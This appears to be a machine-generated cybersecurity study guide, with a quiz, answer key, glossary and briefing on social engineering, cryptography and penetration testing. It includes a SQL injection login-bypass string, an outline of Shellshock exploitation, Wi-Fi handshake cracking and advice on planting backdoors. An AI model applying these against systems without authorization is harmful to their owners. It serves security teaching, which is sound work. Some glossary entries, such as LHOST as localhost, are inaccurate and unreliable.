The provided sources offer a comprehensive overview of cybersecurity in 2024. They explore foundational and advanced concepts crucial for aspiring cybersecurity professionals, including cryptography, risk management, security technologies, and ethical hacking methodologies. The texts detail various types of hackers, their motivations, and the ethical responsibilities of cybersecurity experts. Furthermore, the sources introduce essential tools like Nmap, Metasploit, and Wireshark, explaining their practical applications in vulnerability assessment and penetration testing. Finally, they discuss common cyber threats such as phishing, SQL injection, and cross-site scripting, alongside preventative measures and career paths in the cybersecurity field.

Cybersecurity Fundamentals Study Guide

Quiz

Explain the concept of social engineering in the context of cybersecurity. Provide an example of a common social engineering tactic and why it is often successful.
Describe the purpose of encryption in cybersecurity. Differentiate between symmetric and asymmetric encryption, highlighting a key advantage of each.
What is a brute-force attack, and why can it be time-consuming? Briefly describe two other methods of cryptanalysis besides brute force.
Explain the difference between a white hat hacker and a black hat hacker. What is the primary role of an ethical hacker within an organization?
Outline the five phases of penetration testing. Which phase is considered the most crucial for a successful penetration test, and why?
Define SQL injection and explain why it is a significant web application vulnerability. Provide a simple example of how an attacker might attempt an SQL injection.
What is a Denial-of-Service (DoS) attack? How does a Distributed Denial-of-Service (DDoS) attack differ from a DoS attack, and why is it generally more challenging to mitigate?
Explain what a botnet is and how it is typically created. What are botnets commonly used for in cyberattacks?
Describe the main difference between a virus and a Trojan horse. Give one example of the negative impact each can have on a computer system.
What is Wireshark, and why is it a valuable tool for network analysis in cybersecurity? Briefly explain what kind of information Wireshark allows a user to see.

Quiz Answer Key

Social engineering involves manipulating individuals into divulging confidential information or performing actions that compromise security. A common tactic is phishing, where fraudulent emails from seemingly trustworthy sources trick users into revealing passwords or clicking malicious links. This is often successful because it exploits human psychology, such as trust and urgency.
Encryption transforms data into an unreadable format (ciphertext) to protect its confidentiality. Symmetric encryption uses the same key for encryption and decryption, offering speed. Asymmetric encryption uses separate public and private keys, simplifying secure key exchange.
A brute-force attack involves trying every possible key combination to decrypt data, which can take a significant amount of time due to the vast number of potential keys. Two other cryptanalysis methods are dictionary attacks (using a list of common passwords) and rainbow table attacks (using pre-computed hash values).
A white hat hacker (ethical hacker) works to find security vulnerabilities in systems with permission to improve security, while a black hat hacker exploits vulnerabilities for malicious purposes. The primary role of an ethical hacker is to identify weaknesses and recommend solutions to protect an organization’s assets.
The five phases of penetration testing are reconnaissance (information gathering), scanning, exploitation, post-exploitation, and reporting. Reconnaissance is considered the most crucial because the quality and breadth of information gathered directly impact the effectiveness of subsequent phases by informing the choice of tools and attack vectors.
SQL injection is a vulnerability that allows attackers to insert malicious SQL code into an application’s database queries. It’s significant because it can lead to data breaches, unauthorized access, and data manipulation. An attacker might try entering ‘ OR ‘1’=’1 into a username field to bypass authentication.
A Denial-of-Service (DoS) attack aims to disrupt a service by overwhelming it with traffic from a single source, making it unavailable to legitimate users. A Distributed Denial-of-Service (DDoS) attack uses numerous compromised devices (bots) to flood the target, making it harder to block the attack source and increasing the volume of malicious traffic.
A botnet is a network of compromised devices (bots) infected with malware and controlled remotely by a single attacker (bot herder). Botnets are typically created by exploiting vulnerabilities or using social engineering to spread malware. They are commonly used for DDoS attacks, spam distribution, and data theft.
A virus is a malicious code that attaches itself to a host program and replicates by spreading to other programs, often causing system damage or data corruption. A Trojan horse disguises itself as legitimate software but contains hidden malicious functionality, such as creating backdoors for unauthorized access or stealing data.
Wireshark is a network protocol analyzer that captures network packets in real time and displays them in a human-readable format. It is valuable for cybersecurity as it allows users to examine network traffic, identify security issues, troubleshoot network problems, and understand communication protocols at a detailed level, including source and destination IPs, protocols used, and data content.

Essay Format Questions

Discuss the evolving landscape of cyber threats and the increasing importance of ethical hacking in mitigating these risks. Provide specific examples of how ethical hacking methodologies can be applied to different types of cyber threats.
Compare and contrast different types of social engineering attacks, analyzing the psychological principles that attackers exploit. Evaluate the effectiveness of various countermeasures that organizations and individuals can implement to defend against these attacks.
Analyze the strengths and weaknesses of different encryption methods (symmetric vs. asymmetric) and cryptanalysis techniques. Discuss scenarios where specific encryption algorithms and cryptanalysis approaches are most effective or vulnerable.
Evaluate the significance of penetration testing in an organization’s cybersecurity strategy. Discuss the different phases of a penetration test and the critical factors that contribute to its success in identifying and addressing vulnerabilities.
Examine the technical mechanisms and impacts of Denial-of-Service and Distributed Denial-of-Service attacks. Discuss various strategies and technologies that organizations can employ to prevent and mitigate these types of attacks.

Glossary of Key Terms

Academic Qualifications: Formal certifications and degrees obtained through educational institutions.
Algorithm: A step-by-step procedure or set of rules used to solve a problem or perform a computation.
Anonymization: The process of removing personally identifiable information from data to protect privacy.
Antivirus: Software designed to detect and remove malicious software (malware) like viruses and Trojans.
API Token: A unique identifier used to authenticate an application or user accessing an Application Programming Interface (API).
ARP Spoofing: A malicious technique where an attacker sends falsified Address Resolution Protocol (ARP) messages over a local area network.
Authentication: The process of verifying the identity of a user, device, or process.
Authorization: The process of determining what actions a user, device, or process is permitted to perform.
Bash Script: A series of commands written in the Bash (Bourne-Again SHell) scripting language, used for automation in Linux and other Unix-like operating systems.
Black Hat Hacker: An individual who attempts to gain unauthorized access to computer systems or networks for malicious purposes.
Block Cipher: A type of symmetric encryption algorithm that encrypts data in fixed-size blocks.
Bot Herder: The individual who controls a botnet.
Botnet: A network of compromised computers or devices (bots) controlled remotely by an attacker to perform malicious tasks.
Brute Force Attack: A cryptanalysis technique that involves trying every possible key or password until the correct one is found.
Buffer Overrun: A vulnerability that occurs when a program writes more data to a buffer than it is allocated to hold, potentially overwriting adjacent memory.
Burp Suite: A popular integrated platform used for web application security testing.
Caesar Cipher: A simple substitution cipher where each letter in the plaintext is shifted a certain number of places down the alphabet.
Capturing Data: The act of intercepting and recording network traffic or other digital information.
Certified Ethical Hacker (CEH): An individual who has the skills and knowledge to look for weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner.
Cipher: The result of encrypting plaintext; also refers to a method of encryption.
Ciphertext: Data that has been encrypted and is unreadable without the correct decryption key.
Command Line Interface (CLI): A text-based interface used to interact with an operating system or application by typing commands.
Content Delivery Network (CDN): A geographically distributed network of proxy servers and their data centers.
Cryptography: The art and science of concealing information to make it unreadable to unauthorized individuals.
Cryptanalysis: The art of breaking codes and ciphers; analyzing cryptographic systems to reveal hidden information.
Cyber Attack: A malicious attempt to gain unauthorized access to a computer system, network, or digital information, typically to disrupt operations, steal data, or cause other harm.
Cyber Security: The practice of protecting computer systems, networks, and digital information from theft, damage, disruption, or unauthorized access.
Data Breach: A security incident in which sensitive, protected, or confidential data is copied, transmitted, viewed, stolen, or used by an individual unauthorized to do so.
Data Encryption Standard (DES): A symmetric-key algorithm for encrypting digital data.
Decryption: The process of converting ciphertext back into its original plaintext using the correct key.
Deep Web: Parts of the World Wide Web whose contents are not indexed by standard search engines.
Denial of Service (DoS) Attack: An attack that aims to make a computer resource unavailable to its intended users.
Dictionary Attack: A cryptanalysis technique that tries to crack passwords by testing words from a dictionary.
Digital Signature: A mathematical technique used to validate the authenticity and integrity of a message or document.
Distributed Denial of Service (DDoS) Attack: A type of DoS attack where the malicious traffic originates from multiple compromised devices.
DNS Enumeration: The process of locating DNS servers and records for a specific domain.
Email Spoofing: The forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source.
Enigma: A famous cryptographic cipher device used by Nazi Germany during World War II.
Encryption: The process of converting data into an unreadable format (ciphertext) to protect its confidentiality.
Exploit: A piece of software, a chunk of data, or a sequence of commands that takes advantage of a vulnerability to cause unintended or unanticipated behavior on computer software, hardware, or something electronic.
Firewall: A network security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
Fishing (Phishing): A type of social engineering attack where attackers send fraudulent messages designed to trick individuals into revealing sensitive information.
Forensic Analysis: The process of examining digital evidence to understand security incidents and gather information for legal or investigative purposes.
Hash Function: A mathematical function that converts an input of arbitrary size into an output of a fixed size (the hash value).
Hash Value: The output of a hash function; often used to verify data integrity.
Hping3: A command-line oriented TCP/IP packet generator and analyzer.
HTTPS: A secure version of the HTTP protocol that uses encryption for secure communication over the internet.
Hypertext Markup Language (HTML): The standard markup language for creating web pages.
Incident Response: The process of handling and managing the aftermath of a security incident.
Initialization Vector (IV): A block of bits used in cryptographic algorithms to randomize the encryption and decryption process.
Internet Protocol (IP) Address: A numerical label assigned to each device connected to a computer network that uses the Internet Protocol for communication.
John the Ripper: A popular open-source password security auditing and password recovery tool.
Kali Linux: A Debian-based Linux distribution designed for digital forensics and penetration testing.
Key: A piece of information used in cryptography to encrypt or decrypt data.
Key Generation: The process of creating cryptographic keys.
Localhost (LHOST): The IP address of the local computer (typically 127.0.0.1).
Macro Virus: A computer virus written in a macro language embedded in a software application.
Malicious Hackers (Black Hats): Individuals who exploit vulnerabilities in computer systems or networks for unauthorized or harmful purposes.
Malware: Software that is intended to damage or disable computers and computer systems.
Man-in-the-Middle (MITM) Attack: An attack where the attacker secretly relays and potentially alters the communications between two parties who believe they are communicating directly with each other.
Master Boot Record (MBR): The first sector of a storage device that contains code to boot the operating system.
Metasploit: A penetration testing framework that contains a collection of exploits and tools.
Network Architecture: The design and structure of a computer network, including its components and their interactions.
Network Packet: A small unit of data transmitted over a network.
Nikto: An open-source web server scanner that performs comprehensive tests against web servers for multiple types of vulnerabilities.
OASSP Broken Web Applications Project: A collection of intentionally vulnerable web applications used for security testing and training.
Onion Links: Special URLs used to access hidden services on the Tor network.
OpenVAS (Greenbone Vulnerability Manager): A comprehensive vulnerability management system.
Operating System (OS): The software that supports a computer’s basic functions, such as scheduling tasks, executing applications, and controlling peripherals.
Packet Filtering Firewall: A firewall that controls network access by examining the source and destination addresses, protocols, and ports of network packets.
Password Cracking: The process of attempting to recover passwords from stored or transmitted data.
Password Policies: A set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly.
Penetration Testing: A simulated cyberattack performed on a computer system or network to evaluate its security.
Payload: The part of an exploit that performs the intended malicious action.
Peer-to-Peer (P2P) Model: A decentralized communication model where each node can act as both a client and a server.
Phishing: See Fishing.
Plaintext: Unencrypted data.
Port (Networking): A communication endpoint in a computer’s operating system associated with a specific service or application.
Proxy Chains: A tool that forces any TCP connection made by any given application to follow a chain of proxies.
Proxy Firewall: A firewall that acts as an intermediary between a network and the internet, handling requests on behalf of client systems.
Public Key: A cryptographic key that can be shared with others and is used for encryption or verifying digital signatures.
Rainbow Table Attack: A cryptanalysis technique that uses pre-computed tables of hash values to crack passwords.
Ransomware: A type of malware that encrypts a victim’s files and demands a ransom payment to restore access.
Reconnaissance: The initial phase of a penetration test or attack where information about the target is gathered.
Reverse Engineering: The process of analyzing a hardware or software system to understand its design and functionality.
Reverse TCP Connection: A type of network connection where the target machine initiates the connection back to the attacker’s machine.
Risk Assessment: The process of identifying, analyzing, and evaluating potential risks.
Root Access: The highest level of access control in Unix-like operating systems.
Router: A networking device that forwards data packets between computer networks.
RSA: A public-key cryptosystem that is widely used for secure data transmission.
Scanning (Penetration Testing): The phase of a penetration test where tools are used to identify open ports, services, and vulnerabilities on the target system.
Security Auditing: A systematic evaluation of the security of an organization’s information systems.
Server Message Block (SMB): A network file-sharing protocol.
Shell: A command-line interpreter that provides an interface to the operating system.
Shellcode: A small piece of code used as the payload in the exploitation of software vulnerabilities.
Simply Learn: (In the context of the source) An educational platform or website.
Sniffing: The process of monitoring and capturing network traffic.
Social Engineering: The manipulation of individuals to perform actions or divulge confidential information.
SQL (Structured Query Language): A domain-specific language used in programming and designed for managing data held in a relational database management system.
SQL Injection: A code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.
SSL Handshake: The process that initiates a secure communication session between a client and a server using the Secure Sockets Layer (SSL) or Transport Layer Security (TLS) protocol.
Stateful Inspection Firewall: A firewall that keeps track of the state of network connections and makes decisions based on the context of these connections.
Subdomain: A domain that is part of a larger domain.
Substitution Cipher: A method of encryption by which units of plaintext are replaced with ciphertext according to a regular system.
Sudo: A program that allows a permitted user to execute a command as the superuser or another user, as specified by the security policy.
Superuser: A user with administrative privileges (e.g., root in Linux).
Symmetric Encryption: An encryption method in which the same key is used for both encryption and decryption.
SYN Packet: A type of TCP packet used to initiate a connection.
Target URI: The specific Uniform Resource Identifier (path) on a server that is being targeted by an attack.
TCP/IP: The suite of communication protocols used to interconnect network devices on the Internet.
Tor Browser: A web browser designed for anonymity and privacy, using the Tor network.
Trojan Horse: A type of malware that appears to be legitimate software but performs malicious actions when run.
Uncertified Websites: Websites that do not have valid security certificates, potentially indicating a risk.
Vulnerability: A weakness in a system that can be exploited by a threat.
Vulnerability Assessment: The process of identifying and quantifying security vulnerabilities in a system.
Vulnerability Scanner: An automated tool used to identify potential vulnerabilities in computer systems and networks.
VPN (Virtual Private Network): A network that extends a private network across a public network, and enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.
Web Server: A computer system that serves web pages and related content to clients.
White Hat Hacker (Ethical Hacker): A security expert who uses hacking skills to identify security vulnerabilities in systems with the permission of the owner, with the goal of improving security.
Wi-Fi Hacking Tools: Software and techniques used to exploit vulnerabilities in wireless networks.
Wireshark: A free and open-source packet analyzer used for network troubleshooting and analysis.
WPScan: A free, non-commercial vulnerability scanner for WordPress websites.
Zenmap: The official Nmap Security Scanner GUI.

Detailed Briefing Document: Review of Cyber Security and Ethical Hacking Concepts

Introduction:

This briefing document summarizes the main themes, important ideas, and facts presented in the provided source material (“01.pdf”). The document covers a range of cybersecurity topics, from social engineering attacks and cryptography to ethical hacking methodologies, network security measures, malware, and practical demonstrations of penetration testing using tools like Kali Linux. Quotes from the original source are included to highlight key concepts.

1. Social Engineering Attacks:

The source emphasizes the human element as a significant vulnerability in security. Attackers often exploit natural human tendencies like curiosity and greed to gain access to systems or information.

Exploiting Trust: Attackers may pose as legitimate entities to elicit sensitive information. “if a person can interact with you let’s say they’re trying to take a survey and they approach you for a feedback on a particular product that you have been utilizing and they ask you these questions you wouldn’t think twice before giving those answers as long as the request sounds legitimate to us we are able to justify that request we do answer those queries so it’s upon us to verify the authenticity of the request coming in before we answer it.”
Phishing: This involves fraudulent emails appearing from trusted sources. “fishing as discussed would be fraudulent emails which appear to be coming from a trusted source so email spoofing comes into mind fake websites and so on so forth.”
Exploiting Curiosity: Leaving infected devices like USB drives in public places can lure unsuspecting individuals. “there’s so many physical attacks where hackers just keep pen drives lying around in a parking lot now this is a open generic attack whoever falls victim will fall victim so if I just throw around a few USBs in the parking lot obviously with Trojans implemented on them some people who are curious or who are looking for a couple of freebies might take up those pen drives plug them in their computers to see what data is on the pen drives at the same time once they plug in there those pen drives on their computers the virus or the Trojan would get infected and cause harm to their machine.”
Exploiting Greed: Scams like Nigerian frauds and fake lotteries prey on individuals’ desire for quick financial gain. “exploiting human greed we just talked about the Nigerian frauds and the lotteryies those kind of attacks the fake money-making gimmicks now basically this is where you prey upon the person’s uh greed kicking in and they clicking on those links in order to uh get that money that has been promised to them in that email.”

2. Cryptography:

Encryption is presented as a fundamental mechanism for data privacy and security.

Encryption Process: Cryptography involves scrambling data using algorithms to make it unreadable without the correct key. “one of the safest mechanism to keep data private and to keep yourself secure is using encryption now encryption can happen through cryptography what is cryptography cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user the only person with the key to unscramble that data would be able to unscramble it and make sense out of that data so we’re just making it unreadable or non-readable by using a particular key or a particular algorithm and then we’re going to send the key to the end user the end user using the uh same key would then decrypt that data if anybody compromises that data while it is being sent over the network since it is encrypted they would not be able to read it.”
Cipher and Decryption: Encrypted data is called a cipher. Decryption is the reverse process using the key. The source illustrates a simple substitution cipher. “the encrypted message is also known as a cipher the decryption is just the other way around where you know the key now and you can now figure out what that e correspondent to by going back three characters in the alphabet.”
Cryptanalysis: This is the process of decrypting a message without knowing the secret key. “decryption without the use of a secret key that is known as a crypt analysis crypto analysis is the reversing of an algorithm to figure out what the decryption was without using a key.”
Cryptanalysis Techniques: The source mentions three common techniques:
Brute Force Attack: Trying every possible key combination. “a brute force attack is trying every combination permutation and combination of the key to figure out what the key was it is 100% successful but may take a lot of time.”
Dictionary Attack: Using a list of potential keys (words). “a dictionary attack is where you have created a list of possible encryption mechanisms a list of possible cracks and then you try to figure out whether those cracks work or not.”
Rainbow Table Attack: Comparing encrypted text with pre-computed tables of hashes. “rainbow tables are where you have an encrypted text in hand and you’re trying to figure out uh the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place.”
Spam Mimic: The source demonstrates a tool that encodes messages into seemingly unrelated spam emails for obfuscation. “to begin with the demo of cryptography we are on a website called spammimic.com which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand so if I say I want to encode a message turn a short message into spam so what this does is want to send across a secret message you type in the secret message a short one and it will convert that into a spam mail you send it across so whoever is reading that spam mail would never get an idea of the embedded message within it.”

3. Ethical Hacking:

The source differentiates between ethical and malicious hackers and outlines the responsibilities of an ethical hacker.

White Hat vs. Black Hat: Security experts who work defensively are “white hat hackers,” while malicious attackers are “black hats.” “vulnerabilities and we report them back to the victim or to the client and help them uh patch those vulnerabilities that’s the main difference between a white hat and a black hat so security experts are normally termed as white hat hackers malicious hackers are termed as black hats.”
Responsibilities of an Ethical Hacker: These include:
Identifying and testing vulnerabilities. “first and foremost you have to create scripts test for vulnerabilities first have to identify those in the first place so there’s a vulnerability assessment identifying those vulnerabilities and then you’re going to test them to see the validity and the complexity of those vulnerabilities.”
Developing security tools and configurations. “your one of your responsibilities would be to develop tools to increase security as well or to configure security in such a way that it would be difficult to breach.”
Performing risk assessments. “performing risk assessment now what is a risk risk is a threat that is posed to an organization by a possibility of getting hacked… I do a risk assessment to identify which vulnerability is critical would have the most impact on the client and what would be the repercussions if those vulnerabilities actually get exploited.”
Setting up security policies. “another responsibility of the ethical hacker is to set up policies in such a way that it becomes difficult for hackers to get access to devices or to protected data.”
Training staff on network security. “and finally train the staff for network security so uh we got a lot of employees in an organization we need to train the staff of what is allowed and what is not allowed how to keep themselves secure so that they don’t get compromised thus becoming a vulnerability themselves to the organization.”
Implementing administrative policies like password policies. “the policies that we have talked about are administrative policies to govern the employees of the organization for example password policies most of the organizations will have a tough password policy where they say you have to create a password that meets a certain level of complexity before that can be accepted and till you create that password you’re not allowed to log in or you’re not allowed to register.”

4. Penetration Testing:

Penetration testing is a focused effort to exploit identified vulnerabilities in information systems.

Vulnerability Assessment as a Precursor: It involves scanning for potential flaws before attempting penetration. “now for penetration testing there is a phase called vulnerability assessment that happens before this vulnerability assessment is nothing but running a scanning tool to identify a list of potential flaws or vulnerabilities within the organization.”
Focus on Exploitation: Penetration testing aims to actively breach security defenses. “this is the part of ethical hacking where it specifically focuses on penetration only of the information systems… the essence of penetration testing is to penetrate information systems using various attacks.”
Attack Vectors: These can include phishing, password cracking, Denial of Service (DoS), and exploiting other identified vulnerabilities. “the attacks could be anything like a phishing attack a password cracking attack a denial of service attack or any other vulnerabilities that you have identified uh during the vulnerability scan.”

5. Kali Linux:

Kali Linux is highlighted as a popular operating system for both ethical and malicious hackers due to its pre-installed security tools.

Tool-Rich Distribution: It contains over 600 tools for penetration testing and security auditing. “what is Kali Linux and why is it used kali Linux is an operating system oftenly used by hackers and ethical hackers both because of the tool sets that the operating system contains it is a operating system created by professionals with a lot of embedded tools it is a DVN based operating system with advanced penetration testing and security auditing features there are more than 600 plus odd tools on that operating system that can help you leverage any of the attacks.”
Versatile Capabilities: These tools support various security tasks like man-in-the-middle attacks, sniffing, password cracking, computer forensics, reverse engineering, and information gathering. “contains like I said a hundred of hundreds of tools that are used for various information security tasks like uh computer forensics re reverse engineering information finding even uh getting access to different machines and then uh creating viruses worms to anything that you will 600 plus tools in the Kali Linux operating system.”
Key Features: Kali Linux is open-source, free, regularly updated, customizable, supports wireless network cards and multiple languages, and allows for creating custom attacking scripts and exploits.

6. Phases of Penetration Testing:

The source outlines five key phases of a penetration test:

Reconnaissance (Information Gathering): This crucial phase involves collecting as much information as possible about the target. “the first one is the reconnaissance phase also known as the information gathering phase this is the most important phase for any hacker this is where the hacker or the ethical hacker if you will will gather as much information about the targets victim or vice versa the vict the victim right… for example you want to find out the IP addresses the domains subdomains the network architecture that is being utilized you want to identify operating systems that are being utilized.”
Scanning: Using tools to identify open ports, services, and potential vulnerabilities based on the information gathered. “the second phase is the scanning phase once you have gathered enough information about the target you would then start probing the network or the devices that are within the scope of your test to identify open ports what services are running on those ports what operating systems and versions are being utilized by those machines.”
Gaining Access (Exploitation): Attempting to exploit identified vulnerabilities to gain unauthorized access to the system. “the third phase is gaining access based on the information gathered in the first two phases and the vulnerabilities that you have identified in the second phase you would then try to exploit those vulnerabilities to gain access to the system or the application this could involve using various techniques such as exploiting software flaws, weak passwords, or social engineering tactics.”
Maintaining Access (Post-Exploitation): Once access is gained, the focus shifts to maintaining that access and potentially escalating privileges. “the fourth phase is maintaining access once you have gained access to a system or an application you would want to maintain that access for a certain period of time to gather more information or to perform further actions this could involve installing back doors, creating new accounts, or pivoting to other systems within the network.”
Reporting: Documenting the findings, vulnerabilities exploited, and recommendations for remediation. “the final phase is reporting once the penetration test is complete you would document all of your findings, the vulnerabilities that you have exploited, the impact of those vulnerabilities, and your recommendations for remediation this report is then provided to the client to help them improve their security posture.”

7. Vulnerability Assessment Examples:

The source provides demonstrations of common vulnerabilities:

SQL Injection: This attack exploits vulnerabilities in how web applications handle user input to interact with databases. By injecting malicious SQL code, an attacker can bypass authentication or extract sensitive data. The demonstration shows how a simple SQL injection can bypass a login form (“single quote or 1= 1 space – space”) and how a different injection can dump database contents in a user lookup form (“single quote or 1= 1 space”). The source emphasizes that “the vulnerability will always lie in the application it is the developer’s prerogative of how to develop the application how to configure it to prevent SQL injection queries from happening.” Different types of SQL injection are mentioned: inband (error-based, union-based), blind (boolean-based, time-based), and out-of-band.
Password Cracking: The demonstration uses the “Kane enable” tool on a Windows 7 machine to extract password hashes and attempts to crack them using a brute-force attack. It highlights how Windows stores password hashes and the time-consuming nature of brute-force attacks.
Shellshock Vulnerability: The source demonstrates exploiting the Shellshock vulnerability on a Linux web server using Kali Linux and Metasploit. This involves using reconnaissance tools like Zenmap and Sparta to identify the target and the vulnerability, and then using Metasploit to execute a payload and gain remote access (“meterpreter session”).

8. Network Security Measures:

The document touches upon several network security technologies:

VPN (Virtual Private Network): VPNs encrypt internet traffic and mask the user’s IP address, enhancing privacy and security, especially on public Wi-Fi. The example of Jude at the airport illustrates the risks of using public Wi-Fi without a VPN, where a hacker could intercept her bank transaction details. “bank officials advise her to use a VPN for future transactions especially when connecting to an open or public network.” The process involves the user’s computer connecting to the ISP, then to the VPN server (which encrypts the data and provides a new IP address), and finally to the target server.
Tor (The Onion Router): Tor is presented as a network that anonymizes internet traffic by routing it through multiple relays. It hides the user’s IP address and location. The demonstration shows how to use the Tor Browser, check the apparent IP address and location, and access “.onion” websites (hidden services). “the tour browser is a very effective way of anonymizing your internet activity it works by routing your traffic through multiple relays across the world encrypting it at each step and making it very difficult to trace your original IP address or your location.”
Firewalls: Firewalls act as virtual walls, filtering incoming and outgoing network traffic based on predefined rules. They protect devices from unauthorized access and malicious data packets. “firewalls are security devices that filter the incoming and outgoing traffic within a private network… the firewall works like a gatekeeper at your computer’s entry point which only welcomes incoming traffic that it has been configured to accept.” Different types of firewalls are mentioned: packet filtering, stateful inspection, and proxy firewalls.

9. Malware:

The source discusses different types of malware:

Viruses: These are malicious programs that attach themselves to other files and replicate. Types discussed include boot sector viruses (affecting system startup), macro viruses (embedded in documents), and direct action viruses (activate upon execution and then exit). “for the first part we saw the main objective of the virus is to harm the data and information in a system… viruses have the ability to replicate itself to harm multiple files whereas Trojan does not have the replication ability.” Detection methods include system slowdowns, application freezes, data corruption, unexpected logouts, and frequent crashes. The MYDOOM virus is mentioned as a famous example.
Trojans: Trojans disguise themselves as legitimate software but perform malicious actions once executed. Types discussed include backdoor Trojans (providing remote access), click fraud Trojans (generating fraudulent clicks), and ransomware Trojans (blocking access and demanding payment). “for the Trojan we have stealing of the data files and information… Trojan horses are remote accessed and lastly viruses have the ability to replicate itself to harm multiple files whereas Trojan does not have the replication ability.” Detection includes frequent crashes, slow reaction times, random pop-ups, and changes in system applications and desktop appearance. The Emotet Trojan is mentioned for financial theft.
Botnets: These are networks of infected devices (bots) controlled remotely by an attacker (bot herder) to perform large-scale attacks like data theft, server failures, malware propagation, and DoS attacks. The creation process involves preparing the botnet army (infecting devices), establishing connection to the control server, and launching the attack. Architectures include client-server and peer-to-peer models. The Mirai and Zeus botnets are given as examples.

10. Denial of Service (DoS) Attacks:

DoS attacks aim to disrupt services by overwhelming a target with traffic, making it unavailable to legitimate users. “a denial of service attack is an attack that aims to make a computer or a network resource unavailable to its intended users by disrupting the service of a host connected to the internet.” The source explains Distributed Denial of Service (DDoS) attacks involve multiple compromised systems launching attacks simultaneously. Mitigation techniques include over-provisioning bandwidth and using a Content Delivery Network (CDN). A demonstration using the “hping3” tool from Parrot Security to flood a Linux Light virtual machine with SYN packets showcases the impact of a DoS attack.

11. Wi-Fi Hacking:

The source demonstrates capturing Wi-Fi handshakes and attempting to crack passwords using tools within Kali Linux (likely Aircrack-ng suite, although “Air Garden” is mentioned as a multi-use bash script). The process involves using tools to monitor wireless networks, capture the WPA/WPA2 handshake during authentication, and then using brute-force or dictionary attacks to try and decrypt the handshake file and reveal the Wi-Fi password.

12. Security Tools (Beyond Kali Specifics):

The source briefly introduces several key security tools:

Wireshark: A network protocol analyzer used for capturing and analyzing network traffic at a microscopic level, aiding in real-time or offline network analysis and identifying traffic patterns. “Wireshark is a popular open-source tool to capture network packets and converts them to human readable binary format it provides every single detail of the organization’s network infrastructure it consists of devices designed to help measure the ins and outs of the network.”
Air Garden: Described as a multi-use bash script for Linux systems to hack and audit wireless networks, capable of launching DoS attacks and supporting various Wi-Fi hacking methods.
John the Ripper: An open-source password security auditing and recovery tool supporting numerous hash and cipher types, utilizing dictionary attacks and brute-forcing. “john the Ripper is an open-source password security auditing and password recovery tool available for many operating systems john the Ripper Jumbo supports hundred of hash and cipher types including for user passwords of operating systems web apps groupware database servers network traffic captures encrypted private keys file systems and document files.”
Nmap (Network Mapper): A network scanning tool using IP packets to identify devices, open ports, services, and operating systems on a network.
Burp Suite: A powerful tool for web application security testing, used for configuring proxies, intercepting and inspecting traffic, and identifying vulnerabilities.
Metasploit Framework: A penetration testing tool used for exploit development and execution against identified vulnerabilities, providing a platform for launching attacks and gaining access to systems.

13. Cryptography Algorithms in Detail:

The source delves deeper into specific cryptographic algorithms:

Hashing: A process that creates a fixed-size output (hash value) from variable-sized input data. Hash functions are generally not reversible without extensive brute-force efforts and are useful for storing passwords securely by comparing hash values instead of plain text.
Symmetric Cryptography: Uses the same key for both encryption and decryption.
DES (Data Encryption Standard): An older symmetric block cipher with a 56-bit key. Despite its past prominence, its short key length makes it vulnerable to brute-force attacks. The source explains the Feistel structure it uses, involving multiple rounds of substitution and permutation. Different modes of operation (ECB, CBC, CFB, OFB, Counter) are also discussed. Its dominance ended in 2002 when AES replaced it as the standard.
AES (Advanced Encryption Standard): A symmetric block cipher with 128-bit block size and key sizes of 128, 192, or 256 bits. It became the NIST standard in 2002 due to DES’s short key length.
Asymmetric Cryptography: Uses separate keys for encryption (public key) and decryption (private key).
RSA: A public-key signature algorithm and encryption/decryption algorithm. The source explains the key generation process involving two large prime numbers, and the encryption and decryption formulas. It can be used for both securing data exchange and verifying digital signatures.
Digital Signatures: Used to verify the authenticity and integrity of data.
DSA (Digital Signature Algorithm): A public key signature algorithm. The source outlines the key generation, signature generation (using a hash function and random integer), and signature verification processes. It highlights DSA’s robustness and faster key generation compared to RSA.

14. Ethical Considerations and AI in Cyber Security:

The document touches upon the ethical use of hacking techniques, emphasizing the importance of permission and controlled environments. It also introduces “HackerGPT,” an AI language model trained in cybersecurity, capable of answering questions, providing code snippets for tasks like port scanning and log monitoring, and explaining security concepts like SQL injection and Burp Suite configuration. This suggests the growing role of AI in both offensive and defensive cybersecurity practices.

15. Penetration Testing Methodologies (Types):

The source categorizes penetration testing based on the tester’s knowledge of the system:

Black Box Testing: The tester has no prior knowledge, simulating an external attacker.
White Box Testing: The tester has full access to system details, simulating an insider threat or a highly informed attacker.
Gray Box Testing: The tester has partial knowledge, such as user credentials or limited architecture details.

16. Installation of Security Tools on Kali Linux:

The document provides a practical guide to installing essential penetration testing tools on Kali Linux using the sudo apt install command. Tools mentioned include Nmap, Whois, Dig (DNS utilities), Nikto, WPScan, OpenVAS (Greenbone Vulnerability Manager), and Metasploit Framework. It also demonstrates checking the versions of some of these tools.

Conclusion:

The provided source material offers a comprehensive overview of various cybersecurity concepts, ranging from social engineering tactics to advanced cryptographic algorithms and practical penetration testing methodologies. It highlights the importance of understanding both offensive and defensive security techniques and introduces the role of specialized tools like Kali Linux and the emerging influence of AI in the field. The inclusion of practical demonstrations and tool installation guides provides a valuable introduction to hands-on cybersecurity practices, albeit within ethical and controlled environments.

General Cyber Security Concepts

What are some common social engineering tactics used in cyber attacks? Social engineering exploits human psychology to gain access to systems or information. Common tactics include phishing (fraudulent emails from trusted sources), exploiting curiosity (leaving infected USB drives in public places), and exploiting greed (Nigerian scams, fake lotteries). Attackers often impersonate legitimate entities or create seemingly plausible scenarios to trick individuals into divulging sensitive data or performing malicious actions. Verifying the authenticity of requests and being cautious about unsolicited offers are crucial defenses against these tactics.
What is encryption and why is it important for data security? Encryption is the process of scrambling data using a specific algorithm (cryptography) so that it becomes unreadable to unauthorized users. The original data can only be restored (decrypted) by someone possessing the correct key. Encryption is a fundamental security mechanism for keeping data private and secure, especially when transmitted over networks. Even if data is intercepted, without the decryption key, it remains nonsensical to the attacker. Various algorithms exist, and their complexity determines the difficulty of breaking the encryption.
